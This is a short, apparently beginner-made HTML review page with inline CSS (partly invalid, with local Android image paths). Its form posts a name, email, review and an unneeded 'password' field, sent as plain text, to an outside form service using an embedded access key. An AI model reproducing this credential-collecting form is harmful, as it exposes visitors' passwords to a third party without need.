<!DOCTYPE html>

<html>
<head>
  <meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
  <title>review</title>
  <style>*{
  margin:0;
  padding:0;
  box-sizing:border-box;
  color:black;
}
body{
    position:relative;
    width:100%;
    min-height:100vh;
    height:auto;
    display:flex;
    justify-content:center;
    align-items:center;
    background:url('../8846/bg.png');
    background-size:cover;
    background-position:center;
    font-family:'roboto',sans-serif;
    background:url('/storage/emulated/0/Android/bd35caa1d66da3a15ed952b4ac1010f7.jpg');
  background-repeat:none;
  background-size:cover
  }
  
 
 #parth{
    width:400px;
    height:300px;
    color:black;
    text-align:center;
    font-family:'roboto', sans-serif;
    border-radius: 20px;
    background:url('/storage/emulated/0/Android/Picsart_23-08-26_14-09-21-807-1336x2048.jpg');
  }
 h2{
    text-transform:capitalize;
    text-align: center;
    font-size:25px;
    font-weight:300;
    margin-bottom:50px;
    background: yellow;
    padding: 1px;
  }
  input{
    width:80%;
    height:35px;
    display:block;
    margin:20px auto;
    border-radius:5px;
    background:rgba(255,255,255,0.3);
    border:#dddd;
    color:white;
    padding:15px;
    transition:5s;
    text-transform:capitalize;
  }
 textarea{; width:80%;
    height:35px;
    display:block;
    margin:20px auto;
    border-radius:5px;
    background:rgba(255,255,255,0.3);
    border:#dddd;
    color:white;
    padding:15px;
    transition:5s;
    text-transform:capitalize;
  }
  button{
    color:black;
    background:gold;
    
    align-items:center;
    justify-content:center;
  }
 label {color:white;
   align-items:center;
  justify-content:center;
   background:grey;
   font-size:15px
 }
    input:placeholder
    {
      color:white;}
      .sumbit-btn{
        width:auto;
        padding:0 20px;
        cursor:50px auto0;  }  </style>

</head>

<body>
  
  <div id="no"></div>
  
 <form action="https://api.web3forms.com/submit" method="POST">
   <div id="parth">
     <br>
    <input type="hidden" name="access_key" value="bf82b529-d630-4ac9-a44c-f553caade4f6">
   <div align="center"><label></label>
   
   <input type="text" name="name" placeholder="enter your name"  required>
    <label></label>
  <input type="name" name="name" placeholder="password" required>
   </label>
    <input type="email" name="email" placeholder="email" required>
     <label></label>
   <textarea name="message" placeholder="enter your review" required></textarea>
    <button class="btn" type="submit">Submit</button>
   </div>
</form>
</body>
</html>
